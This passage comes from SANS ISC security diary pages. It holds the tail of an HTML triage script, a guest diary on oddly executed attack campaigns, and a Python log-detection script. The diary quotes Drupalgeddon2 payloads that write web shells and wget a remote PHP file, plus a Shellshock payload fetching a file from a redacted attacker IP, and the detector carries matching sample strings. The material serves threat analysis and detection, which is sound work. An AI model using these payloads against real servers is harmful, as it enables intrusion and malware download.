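    run = 0
    for line in body.split("\n"):              # longest run of consecutive empty lines
        run = run + 1 if line.strip() == "" else 0
        report["longest_blank_run"] = max(report["longest_blank_run"], run)
    for m in B64_RE.finditer(body):
        try:
            decoded = base64.b64decode(m.group(0), validate=True)
        except ValueError:                     # binascii.Error is a ValueError subclass
            continue
        report["base64_blobs"].append({"offset": m.start(), "encoded_len": len(m.group(0)),
                                       "decoded_len": len(decoded)})
        # identify bundled libraries by the version banners in their license headers
        report["embedded_libraries"] += [f"{n.decode()} {v.decode()}"
                                         for n, v in LIB_RE.findall(decoded)]
    report["action_urls"] = ACTION_RE.findall(body)
    report["suspicious"] = (report["bom"] and report["longest_blank_run"] >= blank_threshold
                            and bool(report["base64_blobs"]))
    return report

if __name__ == "__main__":
    for key, value in triage_html(SAMPLE_HTML).items():
        print(f"{key}: {value}")
```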

[1] https://www.virustotal.com/gui/file/54b2efcf5aef60ce3654d2f73f5fd438382b09168c6b599798ec9da8d204c562/detection
[2] https://www.w3.org/International/questions/qa-byte-order-mark
[3] http://whois.domaintools.com/96.lt

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant
PGP Key


[Guest Diary] The good, the bad and the non-functional, or "how not to do an attack campaign", (Thu, Aug 8th)

[This is a guest diary submitted by Jan Kopriva]

Probably anyone who deals with security analysis of logs, PCAPs or other artifacts on a daily basis has come across some strange or funny texts, payloads or messages in them.

Sometimes these unusual texts are intended as jokes (such as the "DELETE your logs" poem which was logged by a large number of HTTP servers back in 2015 [1]), while at other times they may be connected with malicious activity. If you have an IPS/IDS deployed in front of your web servers, you've no doubt seen logs of HTTP GET requests for the path "/w00tw00t.at.blackhats.romanian.anti-sec:)". Although these requests might seem funny, they are an indicator of a potential attack, since they are generated by the ZmEu scanner, which is often used in campaigns targeting servers with phpMyAdmin installed.

While certain benign-looking requests, such as the ones generated by ZmEu, might indicate malicious activity, sometimes the opposite is true as well. A couple of times this year, we've noticed untargeted attempts at exploiting vulnerabilities on web servers with the intent of informing administrators about the need to patch the software they're running.

Some of these warning activities were "grey" in nature at best. This was the case with the following example from March 2019, where the message to an administrator of a WordPress site was followed by an attempt to exfiltrate data from the targeted server.

Other attempts at warning administrators, however, seemed to be well-intentioned, if not strictly ethical. A good example might be a campaign targeting Drupal sites vulnerable to CVE-2018-7600 (i.e. the "Drupalgeddon2" vulnerability), which was active in March and April of this year and in which its authors tried to get the message across by creating a file on the server named vuln.htm containing the text "Vuln!! patch it Now!".

When decoded (and with line breaks added), the POST data look like this:

mail[#markup]=echo Vuln!! patch it Now!> vuln.htm&
mail[#type]=markup&
form_id=user_register_form&
_drupal_ajax=1&
mail[#post_render][]=exec

Unfortunately, it seems that some not-so-well-intentioned actors took inspiration from this, as a similar campaign appeared in April, in which its authors tried to create the same file with the same content on the targeted server. Unfortunately, they tried to create a couple of web shells named vuln.php, modify the .htaccess file and download another PHP file to the server at the same time.

When decoded (and again slightly modified), the parameters in the request look like this:

/?q=user/password&
name[#post_render][]=passthru&
name[#type]=markup&name[#markup]=echo 'Vuln!! patch it Now!' > vuln.htm; 
echo 'Vuln!!'> sites/default/files/vuln.php; 
echo 'Vuln!!'> vuln.php; cd sites/default/files/; 
echo 'AddType application/x-httpd-php .jpg' > .htaccess; 
wget 'http://domain_redacted/Deutsch/images/up.php'

The unfortunate fact that in this case, a malicious actor managed to create something damaging based on something which was intended to be benign and possibly even helpful reminded me of an interesting campaign, where the opposite was true and where the relevant logs and PCAPs were both strange and funny.

In this campaign, which we detected between July 23, 2016, and August 4, 2016, its author tried to target web servers vulnerable to Shellshock using HTTP GET requests with a payload placed in the User-Agent header. So far nothing unusual.

What made this campaign stand out was that its author seemed to have reused someone else's code in an incorrect fashion. The payload code was straightforward and appeared to have been intended to download a malicious file from the attacker's domain to the targeted server. However, the actor behind the campaign probably made a mistake while modifying the placeholders in the code where his own domain should have been, which resulted in something quite unexpected...

The relevant part of payload (slightly modified) looks like this:

system("wget http://ip_redacted/YOUR_URL_HERE ;
curl -O http://ip_redacted/YOUR_URL_HERE ;
fetch http://ip_redacted/YOUR_URL_HERE");

It probably won't come as a surprise that the path /YOUR_URL_HERE on the attacker's server (all requests seen contained the same IP address for this server) didn't contain any file, and attempts to access it resulted in an HTTP 404 code. That meant that even if a vulnerable server was targeted, the payload wouldn't be able to download any malicious files to it.

Someone mentioned a theory to me at the time that it might have been an original promotional campaign for a botnet for hire (i.e. "As you may see, I have this active botnet which may be used to spread malware – YOUR URL could be HERE"). However, this seems quite unlikely, and a far more probable explanation is that the malicious actor simply made an error.

Although this isn’t the only malicious campaign where an attacker seems to have made a simple mistake like this, the fact that it ran for almost two weeks in this broken state makes it quite unusual…and one of the best examples I’ve ever seen of how not to do an attack campaign.
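
As an added example (not part of the guest diary), the following Python runs detection rules for the three request patterns discussed above (the ZmEu scanner path, a Shellshock function definition in the User-Agent header, and Drupalgeddon2 render-array keys in form parameters) over constructed combined-format access log lines. The addresses, timestamps and User-Agent strings are made up; the Drupal form parameters follow the decoded POST data shown in the diary.

```python
import re
from urllib.parse import unquote_plus

# Combined log format (Apache/nginx default): we inspect the request line and the User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

# Detection rules: (name, predicate over a parsed record)
RULES = [
    # marker path of the ZmEu scanner mentioned in the diary
    ("zmeu-scanner",
     lambda r: "/w00tw00t.at.blackhats.romanian.anti-sec" in r["uri"]),
    # Shellshock: a bash function definition "() {" carried in the User-Agent header
    ("shellshock-user-agent",
     lambda r: re.search(r"\(\)\s*\{", r["ua"]) is not None),
    # Drupalgeddon2 (CVE-2018-7600): render-array keys such as [#post_render] injected into
    # form parameters, whether they arrive in the query string or in a POST body
    ("drupalgeddon2-render-array",
     lambda r: "[#post_render]" in r["decoded_uri"] or "[#post_render]" in r["decoded_body"]),
]

def parse_log_line(line: str, body: str = ""):
    """Parse one combined-format line; body is the raw POST body if your logging keeps it."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # percent-decode so that name%5B%23post_render%5D%5B%5D reads name[#post_render][]
    rec["decoded_uri"] = unquote_plus(rec["uri"])
    rec["decoded_body"] = unquote_plus(body)
    return rec

def scan(lines, bodies=None):
    """Return [(line_number, rule_name, client_ip)] for every rule that fires."""
    bodies = bodies or {}
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse_log_line(line, bodies.get(n, ""))
        if rec is None:
            continue
        hits.extend((n, name, rec["ip"]) for name, pred in RULES if pred(rec))
    return hits

# Constructed log lines (documentation-range addresses, made-up timestamps), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2019:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.11 - - [08/Aug/2019:10:00:02 +0000] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 209 "-" "ZmEu"',
    '192.0.2.12 - - [08/Aug/2019:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 0 "-" "() { :; }; echo scan-test"',
    '192.0.2.13 - - [08/Aug/2019:10:00:04 +0000] "GET /?q=user/password&name%5B%23post_render%5D%5B%5D=passthru&name%5B%23type%5D=markup HTTP/1.1" 200 1024 "-" "python-requests/2.22"',
    '192.0.2.14 - - [08/Aug/2019:10:00:05 +0000] "POST /user/register HTTP/1.1" 200 100 "-" "curl/7.58"',
]
# POST body for line 5, percent-encoded as it travels on the wire (the decoded form is the one
# shown in the diary). Only available when request bodies are logged or captured.
SAMPLE_BODIES = {5: "mail%5B%23markup%5D=echo+Vuln%21%21+patch+it+Now%21%3E+vuln.htm"
                    "&mail%5B%23type%5D=markup&form_id=user_register_form&_drupal_ajax=1"
                    "&mail%5B%23post_render%5D%5B%5D=exec"}

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG, SAMPLE_BODIES):
        print(hit)
```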

[1] https://www.theregister.co.uk/2016/01/06/30_million_servers_log_poem/